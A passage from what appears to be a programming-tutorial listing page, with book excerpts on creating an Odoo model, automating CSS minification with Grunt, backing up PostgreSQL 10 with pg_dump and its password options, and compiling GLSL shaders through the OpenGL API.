fields class LibraryBook(models.Model): _name = 'library.book' name = fields.Char('Title', required=True) date_release = fields.Date('Release Date') author_ids = fields.Many2many( 'res.partner', string='Authors' ) Add a Python initialization file with code files to be loaded by the models/__init__.py module with the following code: from . import library_book Edit the module Python initialization file to have the models/ directory loaded by the module: from . import models Upgrade the Odoo module, either from the command line or from the apps menu in the user interface. If you look closely at the server log while upgrading the module, you should see this line: odoo.modules.registry: module my_module: creating or updating database table After this, the new library.book model should be available in our Odoo instance. If we have the technical tools activated, we can confirm that by looking it up at Settings | Technical | Database Structure | Models. How it works... Our first step was to create a Python file where our new module was created. Odoo models are objects derived from the Odoo Model Python class. When a new model is defined, it is also added to a central model registry. This makes it easier for other modules to make modifications to it later. Models have a few generic attributes prefixed with an underscore. The most important one is _name, providing a unique internal identifier to be used throughout the Odoo instance. The model fields are defined as class attributes. We began defining the name field of the Char type. It is convenient for models to have this field, because by default, it is used as the record description when referenced from other models. We also used an example of a relational field, author_ids. It defines a many-to-many relation between Library Books and the partners. A book can have many authors and each author can have written many books. Next, we must make our module aware of this new Python file. This is done by the __init__.py files. Since we placed the code inside the models/ subdirectory, we need the previous __init__ file to import that directory, which should, in turn, contain another __init__ file importing each of the code files there (just one, in our case). Changes to Odoo models are activated by upgrading the module. The Odoo server will handle the translation of the model class into database structure changes. Although no example is provided here, business logic can also be added to these Python files, either by adding new methods to the Model's class or by extending the existing methods, such as create() or write(). Thus we learned about the structure of an Odoo addon module and learned, step-by-step, how to create a simple module from scratch. To know more about, how to define access rules for your data;  how to expose your data models to end users on the back end and on the front end; and how to create beautiful PDF versions of your data, read this book Odoo 11 Development Cookbook - Second Edition. ERP tool in focus: Odoo 11 Building Your First Odoo Application How to Scaffold a New module in Odoo 11
Read more
  • 0
  • 0
  • 49047
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-grunt-makes-it-easy-to-test-and-optimize-your-website-heres-how-tutorial
Sugandha Lahoti
18 Jun 2018
17 min read
Save for later

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Sugandha Lahoti
18 Jun 2018
17 min read
Meet Grunt, the JavaScript Task Runner. As implied by its name, Grunt is a tool that allows us to automatically run any set of tasks. Grunt can even wait while you code, pick up changes made to your source code files (CSS, HTML, or JavaScript) and then execute a pre-configured set of tasks every time you save your changes. This way, you are no longer required to manually execute a set of commands in order for the changes to take effect. In this article, we will learn how to optimize responsive web design using Grunt. Read this article about Tips and tricks to optimize your responsive web design before we get started with Grunt. This article is an excerpt from Mastering Bootstrap 4 - Second Edition by Benjamin Jakobus, and Jason Marah. Let's go ahead and install Grunt: npm install grunt Before we can start using run with MyPhoto, we need to tell Grunt: What tasks to run, that is, what to do with the input (the input being our MyPhoto files) and where to save the output What software is to be used to execute the tasks How to name the tasks so that we can invoke them when required With this in mind, we create a new JavaScript file (assuming UTF-8 encoding), called Gruntfile.js, inside our project root. We will also need to create a JSON file, called package.json, inside our project root. Our project folder should have the following structure (note how we created one additional folder, src, and moved our source code and development assets inside it): src |__bower_components |__images |__js |__styles |__index.html Gruntfile.js package.json Open the newly created Gruntfile.js and insert the following function definition: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json") }); }; As you can see, this is plain, vanilla JavaScript. Anything that we need to make Grunt aware of (such as the Grunt configuration) will go inside the grunt.initConfig function definition. Adding the configuration outside the scope of this function will cause Grunt to ignore it. Now open package.json and insert the following: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { } } The preceding code should be self-explanatory. The name property refers to the project name, version refers to the project's version, and devDependencies refers to any dependencies that are required (we will be adding to those in a while). Great, now we are ready to start using Grunt! Minification and concatenation using Grunt The first thing that we want Grunt to be able to do is minify our files. Yes, we already have minifier installed, but remember that we want to use Grunt so that we can automatically execute a bunch of tasks (such as minification) in one go. To do so, we will need to install the grunt-contrib-cssmin package (a Grunt package that performs minification and concatenation. Visit https://github.com/gruntjs/grunt-contrib-cssmin for more information.): npm install grunt-contrib-cssmin --save-dev Once installed, inspect package.json. Observe how it has been modified to include the newly installed package as a development dependency: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { "grunt": "^0.4.5", "grunt-contrib-cssmin": "^0.14.0" } } We must tell Grunt about the plugin. To do so, insert the following line inside the function definition within our Gruntfile.js: grunt.loadNpmTasks("grunt-contrib-cssmin"); Our Gruntfile.js should now look as follows: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json") }); grunt.loadNpmTasks("grunt-contrib-cssmin"); }; As such, we still cannot do much. The preceding code makes Grunt aware of the grunt-contrib-cssmin package (that is, it tells Grunt to load it). In order to be able to use the package to minify our files, we need to create a Grunt task. We need to call this task cssmin: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json"), "cssmin": { "target": { "files": { "dist/styles/myphoto.min.css": [ "styles/*.css", "!styles/myphoto-hcm.css" ] } } } }); grunt.loadNpmTasks("grunt-contrib-cssmin"); }; Whoa! That's a lot of code at once. What just happened here? Well, we registered a new task called cssmin. We then specified the target, that is, the input files that Grunt should use for this task. Specifically, we wrote this: "src/styles/myphoto.min.css": ["src/styles/*.css"] The name property here is being interpreted as denoting the output, while the value property represents the input. Therefore, in essence, we are saying something along the lines of "In order to produce myphoto.min.css, use the files a11yhcm.css, alert.css, carousel.css, and myphoto.css". Go ahead and run the Grunt task by typing as follows: grunt cssmin Upon completion, you should see output along the lines of the following: Figure 8.1: The console output after running cssmin The first line indicates that a new output file (myphoto.min.css) has been created and that it is 3.25 kB in size (down from the original 4.99 kB). The second line is self-explanatory, that is, the task executed successfully without any errors. Now that you know how to use grunt-contrib-cssmin, go ahead and take a look at the documentation for some nice extras! Running tasks automatically Now that we know how to configure and use Grunt to minify our style sheets, let's turn our attention to task automation, that is, how we can execute our Grunt minification task automatically as soon as we make changes to our source files. To this end, we will learn about a second Grunt package, called grunt-contrib-watch (https://github.com/gruntjs/grunt-contrib-watch). As with contrib-css-min, this package can be installed using npm: npm install grunt-contrib-watch --save-dev Open package.json and verify that grunt-contrib-watch has been added as a dependency: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { "grunt": "^0.4.5", "grunt-contrib-cssmin": "^0.14.0", "grunt-contrib-watch": "^0.6.1" } } Next, tell Grunt about our new package by adding grunt.loadNpmTasks('grunt-contrib-watch'); to Gruntfile.js. Furthermore, we need to define the watch task by adding a new empty property called watch: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json"), "cssmin": { "target":{ "files": { "src/styles/myphoto.min.css": ["src/styles/*.css", "src/styles!*.min.css"] } } }, "watch": { } }); grunt.loadNpmTasks("grunt-contrib-cssmin"); grunt.loadNpmTasks("grunt-contrib-watch"); }; Now that Grunt loads our newly installed watch package, we can execute the grunt watch command. However, as we have not yet configured the task, Grunt will terminate with the following: Figure 8.2: The console output after running the watch task The first thing that we need to do is tell our watch task what files to actually "watch". We do this by setting the files property, just as we did with grunt-contrib-cssmin: "watch": { "target": { "files": ["src/styles/myphoto.css"], } } This tells the watch task to use the myphoto.css located within our src/styles folder as input (it will only watch for changes made to myphoto.css). Even better, we can watch all files: "watch": { "target": { "files": [ "styles/*.css", "!styles/myphoto-hcm.css" ], } } In reality, you would want to be watching all CSS files inside styles/; however, to keep things simple, let's just watch myphoto.css. Go ahead and execute grunt watch again. Unlike the first time that we ran the command, the task should not terminate now. Instead, it should halt with the Waiting... message. Go ahead and make a trivial change (such as removing a white space) to our myphoto.css file. Then, save this change. Note what the terminal output is now: Figure 8.3: The console output after running the watch task Great! Our watch task is now successfully listening for file changes made to any style sheet within src/styles. The next step is to put this achievement to good use, that is, we need to get our watch task to execute the minification task that we created in the previous section. To do so, simply add the tasks property to our target: "watch": { "target": { "files": [ "styles/*.css", "!styles/myphoto-hcm.css" ], "tasks": ["cssmin"] } } Once again, run grunt watch. This time, make a visible change to our myphoto.css style sheet. For example, you can add an obvious rule such as body {background-color: red;}. Observe how, as you save your changes, our watch task now runs our cssmin task: Figure 8.4: The console output after making a change to the style sheet that is being watched Refresh the page in your browser and observe the changes. Voilà! We now no longer need to run our minifier manually every time we change our style sheet. Stripping our website of unused CSS Dead code is never good. As such, whatever the project that you are working on maybe, you should always strive to eliminate code that is no longer in use, as early as possible. This is especially important when developing websites, as unused code will inevitably be transferred to the client and hence result in additional, unnecessary bytes being transferred (although maintainability is also a major concern). Programmers are not perfect, and we all make mistakes. As such, unused code or style rules are bound to slip past us during development and testing. Consequently, it would be nice if we could establish a safeguard to ensure that at least no unused style makes it past us into production. This is where grunt-uncss fits in. Visit https://github.com/addyosmani/grunt-uncss for more. UnCSS strips any unused CSS from our style sheet. When configured properly, it can, therefore, be very useful to ensure that our production-ready website is as small as possible. Let's go ahead and install UnCSS: npm install grunt-uncss -save-dev Once installed, we need to tell Grunt about our plugin. Just as in the previous subsections, update the Gruntfile.js by adding the grunt.loadNpmTasks('grunt-uncss'); line to our Grunt configuration. Next, go ahead and define the uncss task: "uncss": { "target": { "files": { "src/styles/output.css": ["src/index.html"] } } }, In the preceding code, we specified a target consisting of the index.html file. This index.html will be parsed by Uncss. The class and id names used within it will be compared to those appearing in our style sheets. Should our style sheets contain selectors that are unused, then those are removed from the output. The output itself will be written to src/styles/output.css. Let's go ahead and test this. Add a new style to our myphoto.css that will not be used anywhere within our index.html. Consider this example: #foobar { color: red; } Save and then run this: grunt uncss Upon successful execution, the terminal should display output along the lines of this: Figure 8.5: The console output after executing our uncss task Go ahead and open the generated output.css file. The file will contain a concatenation of all of our CSS files (including Bootstrap). Go ahead and search for #foobar. Find it? That's because UnCSS detected that it was no longer in use and removed it for us. Now, we successfully configured a Grunt task to strip our website of the unused CSS. However, we need to run this task manually. Would it not be nice if we could configure the task to run with the other watch tasks? If we were to do this, the first thing that we would need to ask ourselves is how do we combine the CSS minification task with UnCSS? After all, grunt watch would run one before the other. As such, we would be required to use the output of one task as input for the other. So how would we go about doing this? Well, we know that our cssmin task writes its output to myphoto.min.css. We also know that index.html references myphoto.min.css. Furthermore, we also know uncss receives its input by checking the style sheets referenced in index.html. Therefore, we know that the output produced by our cssmin task is sure to be used by our uncss as long as it is referenced within index.html. In order for the output produced by uncss to take effect, we will need to reconfigure the task to write its output into myphoto.min.css. We will then need to add uncss to our list of watch tasks, taking care to insert the task into the list after cssmin. However, this leads to a problem—running uncss after cssmin will produce an un-minified style sheet. Furthermore, it also requires the presence of myphoto.min.css. However, as myphoto.min.css is actually produced by cssmin, the sheet will not be present when running the task for the first time. Therefore, we need a different approach. We will need to use the original myphoto.css as input to uncss, which then writes its output into a file called myphoto.min.css. Our cssmin task then uses this file as input, minifying it as discussed earlier. Since uncss parses the style sheet references in index.html, we will need to first revert our index.html to reference our development style sheet, myphoto.css. Go ahead and do just that. Replace the <link rel="stylesheet" href="styles/myphoto.min.css" /> line with <link rel="stylesheet" href="styles/myphoto.css" />. Processing HTML For the minified changes to take effect, we now need a tool that replaces our style sheet references with our production-ready style sheets. Meet grunt-processhtml. Visit https://www.npmjs.com/package/grunt-processhtml for more. Go ahead and install it using the following command: npm install grunt-processhtml --save-dev Add grunt.loadNpmTasks('grunt-processhtml'); to our Gruntfile.js to enable our freshly installed tool. While grunt-processhtml is very powerful, we will only cover how to replace style sheet references. Therefore, we recommend that you read the tool's documentation to discover further features. In order to replace our style sheets with myphoto.min.css, we wrap them inside special grunt-processhtml comments: <!-- build:css styles/myphoto.min.css --> <link rel="stylesheet" href="bower_components/bootstrap/ dist/css/bootstrap.min.css" /> <link href='https://fonts.googleapis.com/css?family=Poiret+One' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Lato& subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="bower_components/Hover/css/ hover-min.css" /> <link rel="stylesheet" href="styles/myphoto.css" /> <link rel="stylesheet" href="styles/alert.css" /> <link rel="stylesheet" href="styles/carousel.css" /> <link rel="stylesheet" href="styles/a11yhcm.css" /> <link rel="stylesheet" href="bower_components/components- font-awesome/css/font-awesome.min.css" /> <link rel="stylesheet" href="bower_components/lightbox-for -bootstrap/css/bootstrap.lightbox.css" /> <link rel="stylesheet" href="bower_components/DataTables/ media/css/dataTables.bootstrap.min.css" /> <link rel="stylesheet" href="resources/animate/animate.min.css" /> <!-- /build --> Note how we reference the style sheet that is meant to replace the style sheets contained within the special comments on the first line, inside the comment: <!-- build:css styles/myphoto.min.css --> Last but not least, add the following task: "processhtml": { "dist": { "files": { "dist/index.html": ["src/index.html"] } } }, Note how the output of our processhtml task will be written to dist. Test the newly configured task through the grunt processhtml command. The task should execute without errors: Figure 8.6: The console output after executing the processhtml task Open dist/index.html and observe how, instead of the 12 link tags, we only have one: <link rel="stylesheet" href="styles/myphoto.min.css"> Next, we need to reconfigure our uncss task to write its output to myphoto.min.css. To do so, simply replace the 'src/styles/output.css' output path with 'dist/styles/myphoto.min.css' inside our Gruntfile.js (note how myphoto.min.css will now be written to dist/styles as opposed to src/styles). We then need to add uncss to our list of watch tasks, taking care to insert the task into the list after cssmin: "watch": { "target": { "files": ["src/styles/myphoto.css"], "tasks": ["uncss", "cssmin", "processhtml"], "options": { "livereload": true } } } Next, we need to configure our cssmin task to use myphoto.min.css as input: "cssmin": { "target": { "files": { "dist/styles/myphoto.min.css": ["src/styles/myphoto.min.css"] } } }, Note how we removed src/styles/*.min.css, which would have prevented cssmin from reading files ending with the min.css extension. Running grunt watch and making a change to our myphoto.css file should now trigger the uncss task and then the cssmin task, resulting in console output indicating the successful execution of all tasks. This means that the console output should indicate that first uncss, cssmin, and then processhtml were successfully executed. Go ahead and check myphoto.min.css inside the dist folder. You should see how the following things were done: The CSS file contains an aggregation of all of our style sheets The CSS file is minified The CSS file contains no unused style rules However, you will also note that the dist folder contains none of our assets—neither images nor Bower components, nor our custom JavaScript files. As such, you will be forced to copy any assets manually. Of course, this is less than ideal. So let's see how we can copy our assets to our dist folder automatically. The dangers of using UnCSS UnCSS may cause you to lose styles that are applied dynamically. As such, care should be taken when using this tool. Take a closer look at the MyPhoto style sheet and see whether you spot any issues. You should note that our style rules for overriding the background color of our navigation pills were removed. One potential fix for this is to write a dedicated class for gray nav-pills (as opposed to overriding them with the Bootstrap classes). Deploying assets To copy our assets from src into dist, we will use grunt-contrib-copy. Visit https://github.com/gruntjs/grunt-contrib-copy for more on this. Go ahead and install it: npm install grunt-contrib-copy -save-dev Once installed, enable it by adding grunt.loadNpmTasks('grunt-contrib-copy'); to our Gruntfile.js. Then, configure the copy task: "copy": { "target": { "files": [ { "cwd": "src/images", "src": ["*"], "dest": "dist/images/", "expand": true }, { "cwd": "src/bower_components", "src": ["*"], "dest": "dist/bower_components/", "expand": true }, { "cwd": "src/js", "src": ["**/*"], "dest": "dist/js/", "expand": true }, ] } }, The preceding configuration should be self-explanatory. We are specifying a list of copy operations to perform: src indicates the source and dest indicates the destination. The cwd variable indicates the current working directory. Note how, instead of a wildcard expression, we can also match a certain src pattern. For example, to only copy minified JS files, we can write this: "src": ["*.min.js"] Take a look at the following screenshot: Figure 8.7: The console output indicating the number of copied files and directories after running the copy task Update the watch task: "watch": { "target": { 'files": ['src/styles/myphoto.css"], "tasks": ["uncss", "cssmin", "processhtml", "copy"] } }, Test the changes by running grunt watch. All tasks should execute successfully. The last task that was executed should be the copy task. Note that myphoto-hcm.css needs to be included in the process and copied to /dist/styles/, otherwise the HCM will not work. Try this yourself using the lessons learned so far! Stripping CSS comments Another common source for unnecessary bytes is comments. While needed during development, they serve no practical purpose in production. As such, we can configure our cssmin task to strip our CSS files of any comments by simply creating an options property and setting its nested keepSpecialComments property to 0: "cssmin": { "target":{ "options": { "keepSpecialComments": 0 }, "files": { "dist/src/styles/myphoto.min.css": ["src/styles /myphoto.min.css"] } } }, We saw how to use the build tool Grunt to automate the more common and mundane optimization tasks. To build responsive, dynamic, and mobile-first applications on the web with Bootstrap 4, check out this book Mastering Bootstrap 4 - Second Edition. Get ready for Bootstrap v4.1; Web developers to strap up their boots How to use Bootstrap grid system for responsive website design? Bootstrap 4 Objects, Components, Flexbox, and Layout  
Read more
  • 0
  • 0
  • 16014

article-image-handling-backup-and-recovery-in-postgresql-10
Savia Lobo
18 Jun 2018
11 min read
Save for later

Handling backup and recovery in PostgreSQL 10 [Tutorial]

Savia Lobo
18 Jun 2018
11 min read
Performing backups should be a regular task and every administrator is supposed to keep an eye on this vital stuff. Fortunately, PostgreSQL provides an easy means to create backups. In this tutorial, you will learn how to backup data by performing some simple dumps and also recover them using PostgreSQL 10. This article is an excerpt taken from, 'Mastering PostgreSQL 10' written by Hans-Jürgen Schönig. This book highlights the newly introduced features in PostgreSQL 10, and shows you how to build better PostgreSQL applications. Performing simple dumps If you are running a PostgreSQL setup, there are two major methods to perform backups: Logical dumps (extract an SQL script representing your data) Transaction log shipping The idea behind transaction log shipping is to archive binary changes made to the database. Most people claim that transaction log shipping is the only real way to do backups. However, in my opinion, this is not necessarily true. Many people rely on pg_dump to simply extract a textual representation of the data. pg_dump is also the oldest method of creating a backup and has been around since the very early days of the project (transaction log shipping was added much later). Every PostgreSQL administrator will become familiar with pg_dump sooner or later, so it is important to know how it really works and what it does. Running pg_dump The first thing we want to do is to create a simple textual dump: [hs@linuxpc ~]$ pg_dump test > /tmp/dump.sql This is the most simplistic backup you can imagine. pg_dump logs into the local database instance connects to a database test and starts to extract all the data, which will be sent to stdout and redirected to the file. The beauty is that standard output gives you all the flexibility of a Unix system. You can easily compress the data using a pipe or do whatever you want. In some cases, you might want to run pg_dump as a different user. All PostgreSQL client programs support a consistent set of command-line parameters to pass user information. If you just want to set the user, use the -U flag: [hs@linuxpc ~]$ pg_dump -U whatever_powerful_user test > /tmp/dump.sql The following set of parameters can be found in all PostgreSQL client programs: ... Connection options: -d, --dbname=DBNAME database to dump -h, --host=HOSTNAME database server host or socket directory -p, --port=PORT database server port number -U, --username=NAME connect as specified database user -w, --no-password never prompt for password -W, --password force password prompt (should happen automatically) --role=ROLENAME do SET ROLE before dump ... Just pass the information you want to pg_dump, and if you have enough permissions, PostgreSQL will fetch the data. The important thing here is to see how the program really works. Basically, pg_dump connects to the database and opens a large repeatable read transaction that simply reads all the data. Remember, repeatable read ensures that PostgreSQL creates a consistent snapshot of the data, which does not change throughout the transactions. In other words, a dump is always consistent—no foreign keys will be violated. The output is a snapshot of data as it was when the dump started. Consistency is a key factor here. It also implies that changes made to the data while the dump is running won't make it to the backup anymore. A dump simply reads everything—therefore, there are no separate permissions to be able to dump something. As long as you can read it, you can back it up. Also, note that the backup is by default in a textual format. This means that you can safely extract data from say, Solaris, and move it to some other CPU architecture. In the case of binary copies, that is clearly not possible as the on-disk format depends on your CPU architecture. Passing passwords and connection information If you take a close look at the connection parameters shown in the previous section, you will notice that there is no way to pass a password to pg_dump. You can enforce a password prompt, but you cannot pass the parameter to pg_dump using a command-line option. The reason for that is simple: the password might show up in the process table and be visible to other people. Therefore, this is not supported. The question now is: if pg_hba.conf on the server enforces a password, how can the client program provide it? There are various means of doing that: Making use of environment variables Making use of .pgpass Using service files In this section, you will learn about all three methods. Using environment variables One way to pass all kinds of parameters is to use environment variables. If the information is not explicitly passed to pg_dump, it will look for the missing information in predefined environment variables. A list of all potential settings can be found here: https://www.postgresql.org/docs/10/static/libpq-envars.html. The following overview shows some environment variables commonly needed for backups: PGHOST: It tells the system which host to connect to PGPORT: It defines the TCP port to be used PGUSER: It tells a client program about the desired user PGPASSWORD: It contains the password to be used PGDATABASE: It is the name of the database to connect to The advantage of these environments is that the password won't show up in the process table. However, there is more. Consider the following example: psql -U ... -h ... -p ... -d ... Suppose you are a system administrator: do you really want to type a long line like that a couple of times every day? If you are working with the very same host again and again, just set those environment variables and connect with plain SQL: [hs@linuxpc ~]$ export PGHOST=localhost [hs@linuxpc ~]$ export PGUSER=hs [hs@linuxpc ~]$ export PGPASSWORD=abc [hs@linuxpc ~]$ export PGPORT=5432 [hs@linuxpc ~]$ export PGDATABASE=test [hs@linuxpc ~]$ psql psql (10.1) Type "help" for help. As you can see, there are no command-line parameters anymore. Just type psql and you are in. All applications based on the standard PostgreSQLC-language client library (libpq) will understand these environment variables, so you cannot only use them for psql and pg_dump, but for many other applications. Making use of .pgpass A very common way to store login information is via the use of .pgpass files. The idea is simple: put a file called .pgpass into your home directory and put your login information there. The format is simple: hostname:port:database:username:password An example would be: 192.168.0.45:5432:mydb:xy:abc PostgreSQL offers some nice additional functionality: most fields can contain *. Here is an example: *:*:*:xy:abc This means that on every host, on every port, for every database, the user called xy will use abc as the password. To make PostgreSQL use the .pgpass file, make sure that the right file permissions are in place: chmod 0600 ~/.pgpass .pgpass can also be used on a Windows system. In this case, the file can be found in the %APPDATA%postgresqlpgpass.conf path. Using service files However, there is not just the .pgpass file. You can also make use of service files. Here is how it works. If you want to connect to the very same servers over and over again, you can create a .pg_service.conf file. It will hold all the connection information you need. Here is an example of a .pg_service.conf file: Mac:~ hs$ cat .pg_service.conf # a sample service [hansservice] host=localhost port=5432 dbname=test user=hs password=abc [paulservice] host=192.168.0.45 port=5432 dbname=xyz user=paul password=cde To connect to one of the services, just set the environment and connect: iMac:~ hs$ export PGSERVICE=hansservice A connection can now be established without passing parameters to psql: iMac:~ hs$ psql psql (10.1) Type "help" for help. test=# Alternatively, you can use: psql service=hansservice Extracting subsets of data Up to now, you have seen how to dump an entire database. However, this is not what you might wish for. In many cases, you might just want to extract a subset of tables or schemas. pg_dump can do that and provides a number of switches: -a: It dumps only the data and does not dump the data structure -s: It dumps only the data structure but skips the data -n: It dumps only a certain schema -N: It dumps everything but excludes certain schemas -t: It dumps only certain tables -T: It dumps everything but certain tables (this can make sense if you want to exclude logging tables and so on) Partial dumps can be very useful to speed things up considerably. Handling various formats So far, you have seen that pg_dump can be used to create text files. The problem is that a text file can only be replayed completely. If you have saved an entire database, you can only replay the entire thing. In many cases, this is not what you want. Therefore, PostgreSQL has additional formats that also offer more functionality. At this point, four formats are supported: -F, --format=c|d|t|p output file format (custom, directory, tar, plain text (default)) You have already seen plain, which is just normal text. On top of that, you can use a custom format. The idea behind a custom format is to have a compressed dump, including a table of contents. Here are two ways to create a custom format dump: [hs@linuxpc ~]$ pg_dump -Fc test > /tmp/dump.fc [hs@linuxpc ~]$ pg_dump -Fc test -f /tmp/dump.fc In addition to the table of contents, the compressed dump has one more advantage: it is a lot smaller. The rule of thumb is that a custom format dump is around 90% smaller than the database instance you are about to back up. Of course, this highly depends on the number of indexes and all that, but for many database applications, this rough estimation will hold true. Once you have created the backup, you can inspect the backup file: [hs@linuxpc ~]$ pg_restore --list /tmp/dump.fc ; ; Archive created at 2017-11-04 15:44:56 CET ; dbname: test ; TOC Entries: 18 ; Compression: -1 ; Dump Version: 1.12-0 ; Format: CUSTOM ; Integer: 4 bytes ; Offset: 8 bytes ; Dumped from database version: 10.1 ; Dumped by pg_dump version: 10.1 ; ; Selected TOC Entries: ; 3103; 1262 16384 DATABASE - test hs 3; 2615 2200 SCHEMA - public hs 3104; 0 0 COMMENT - SCHEMA public hs 1; 3079 13350 EXTENSION - plpgsql 3105; 0 0 COMMENT - EXTENSION plpgsql 187; 1259 16391 TABLE public t_test hs ... pg_restore --list will return the table of contents of the backup. Using a custom format is a good idea as the backup will shrink in size. However, there is more; the -Fd command will create a backup in a directory format. Instead of a single file, you will now get a directory containing a couple of files: [hs@linuxpc ~]$ mkdir /tmp/backup [hs@linuxpc ~]$ pg_dump -Fd test -f /tmp/backup/ [hs@linuxpc ~]$ cd /tmp/backup/ [hs@linuxpc backup]$ ls -lh total 86M -rw-rw-r--. 1 hs hs 85M Jan 4 15:54 3095.dat.gz -rw-rw-r--. 1 hs hs 107 Jan 4 15:54 3096.dat.gz -rw-rw-r--. 1 hs hs 740K Jan 4 15:54 3097.dat.gz -rw-rw-r--. 1 hs hs 39 Jan 4 15:54 3098.dat.gz -rw-rw-r--. 1 hs hs 4.3K Jan 4 15:54 toc.dat One advantage of the directory format is that you can use more than one core to perform the backup. In the case of a plain or custom format, only one process will be used by pg_dump. The directory format changes that rule. The following example shows how you can tell pg_dump to use four cores (jobs): [hs@linuxpc backup]$ rm -rf * [hs@linuxpc backup]$ pg_dump -Fd test -f /tmp/backup/ -j 4 Note that the more objects you have in your database, the more potential speedup there will be. To summarize, you learned about creating backups in general. If you've enjoyed reading this post, do check out 'Mastering PostgreSQL 10' to know how to replay backup and handle global data in PostgreSQL10.  You will learn how to use PostgreSQL onboard tools to replicate instances. PostgreSQL 11 Beta 1 is out! How to perform data partitioning in PostgreSQL 10 How to implement Dynamic SQL in PostgreSQL 10
Read more
  • 0
  • 0
  • 31136

article-image-working-with-shaders-in-c-to-create-3d-games
Amarabha Banerjee
15 Jun 2018
28 min read
Save for later

Working with shaders in C++ to create 3D games

Amarabha Banerjee
15 Jun 2018
28 min read
A shader is a computer program that is used to do image processing such as special effects, color effects, lighting, and, well, shading. The position, brightness, contrast, hue, and other effects on all pixels, vertices, or textures used to produce the final image on the screen can be altered during runtime, using algorithms constructed in the shader program(s). These days, most shader programs are built to run directly on the Graphical Processing Unit (GPU). In this article, we are going to get acquainted with shaders and implement our own shader infrastructure for the example engine. Shader programs are executed in parallel. This means, for example, that a shader might be executed once per pixel, with each of the executions running simultaneously on different threads on the GPU. The amount of simultaneous threads depends on the graphics card specific GPU, with modern cards sporting processors in the thousands. This all means that shader programs can be very performant and provide developers with lots of creative flexibility. The following article is a part of the book Mastering C++ game Development written by Mickey Macdonald. With this book, you can create advanced games with C++. Shader languages With advances in graphics card technology, more flexibility has been added to the rendering pipeline. Where at one time developers had little control over concepts such as fixed-function pipeline rendering, new advancements have allowed programmers to take deeper control of graphics hardware for rendering their creations. Originally, this deeper control was achieved by writing shaders in assembly language, which was a complex and cumbersome task. It wasn't long before developers yearned for a better solution. Enter the shader programming languages. Let's take a brief look at a few of the more common languages in use. C for graphics (Cg) is a shading language originally developed by the Nvidia graphics company. Cg is based on the C programming language and, although they share the same syntax, some features of C were modified and new data types were added to make Cg more suitable for programming GPUs. Cg compilers can output shader programs supported by both DirectX and OpenGL. While Cg was mostly deprecated, it has seen a resurgence in a new form with its use in the Unity game engine. High-Level Shading Language (HLSL) is a shading language developed by the Microsoft Corporation for use with the DirectX graphics API. HLSL is again modeled after the C programming language and shares many similarities to the Cg shading language. HLSL is still in development and continues to be the shading language of choice for DirectX. Since the release, DirectX 12 the HLSL language supports even lower level hardware control and has seen dramatic performance improvements. OpenGL Shading Language (GLSL) is a shading language that is also based on the C programming language. It was created by the OpenGL Architecture Review Board (OpenGL ARB) to give developers more direct control of the graphics pipeline without having to use ARB assembly language or other hardware-specific languages. The language is still in open development and will be the language we will focus on in our examples. Building a shader program infrastructure Most modern shader programs are composed of up to five different types of shader files: fragment or pixel shaders, vertex shaders, geometry shaders, compute shaders, and tessellation shaders. When building a shader program, each of these shader files must be compiled and linked together for use, much like how a C++ program is compiled and linked. Next, we are going to walk you through how this process works and see how we can build an infrastructure to allow for easier interaction with our shader programs. To get started, let's look at how we compile a GLSL shader. The GLSL compiler is part of the OpenGL library itself, and our shaders can be compiled within an OpenGL program. We are going to build an architecture to support this internal compilation. The whole process of compiling a shader can be broken down into some simple steps. First, we have to create a shader object, then provide the source code to the shader object. We can then ask the shader object to be compiled. These steps can be represented in the following three basic calls to the OpenGL API. First, we create the shader object: GLuint vertexShader = glCreateShader(GL_VERTEX_SHADER); We create the shader object using the glCreateShader() function. The argument we pass in is the type of shader we are trying to create. The types of shaders can be GL_VERTEX_SHADER, GL_FRAGMENT_SHADER, GL_GEOMETRY_SHADER, GL_TESS_EVALUATION_SHADER, GL_TESS_CONTROL_SHADER, or GL_COMPUTE_SHADER. In our example case, we are trying to compile a vertex shader, so we use the GL_VERTEX_SHADER type. Next, we copy the shader source code into the shader object: GLchar* shaderCode = LoadShader("shaders/simple.vert"); glShaderSource(vertexShader, 1, shaderCode, NULL); Here we are using the glShaderSource() function to load our shader source to memory. This function accepts an array of strings, so before we call glShaderSource(), we create a pointer to the start of the shaderCode array object using a still-to-be-created method. The first argument to glShaderSource() is the handle to the shader object. The second is the number of source code strings that are contained in the array. The third argument is a pointer to an array of source code strings. The final argument is an array of GLint values that contains the length of each source code string in the previous argument. Finally, we compile the shader: glCompileShader(vertexShader); The last step is to compile the shader. We do this by calling the OpenGL API method, glCompileShader(), and passing the handle to the shader that we want compiled. Of course, because we are using memory to store the shaders, we should know how to clean up when we are done. To delete a shader object, we can call the glDeleteShader() function. Deleting a Shader ObjectShader objects can be deleted when no longer needed by calling glDeleteShader(). This frees the memory used by the shader object. It should be noted that if a shader object is already attached to a program object, as in linked to a shader program, it will not be immediately deleted, but rather flagged for deletion. If the object is flagged for deletion, it will be deleted when it is detached from the linked shader program object. Once we have compiled our shaders, the next step we need to take before we can use them in our program is to link them together into a complete shader program. One of the core aspects of the linking step involves making the connections between input variables from one shader to the output variables of another and making the connections between the input/output variables of a shader to appropriate locations in the OpenGL program itself. Linking is much like compiling the shader. We create a new shader program and attach each shader object to it. We then tell the shader program object to link everything together. The steps to accomplish this in the OpenGL environment can be broken down into a few calls to the API, as follows: First, we create the shader program object: GLuint shaderProgram = glCreateProgram(); To start, we call the glCreateProgram() method to create an empty program object. This function returns a handle to the shader program object which, in this example, we are storing in a variable named shaderProgram. Next, we attach the shaders to the program object: glAttachShader(shaderProgram, vertexShader); glAttachShader(shaderProgram, fragmentShader); To load each of the shaders into the shader program, we use the glAttachShader() 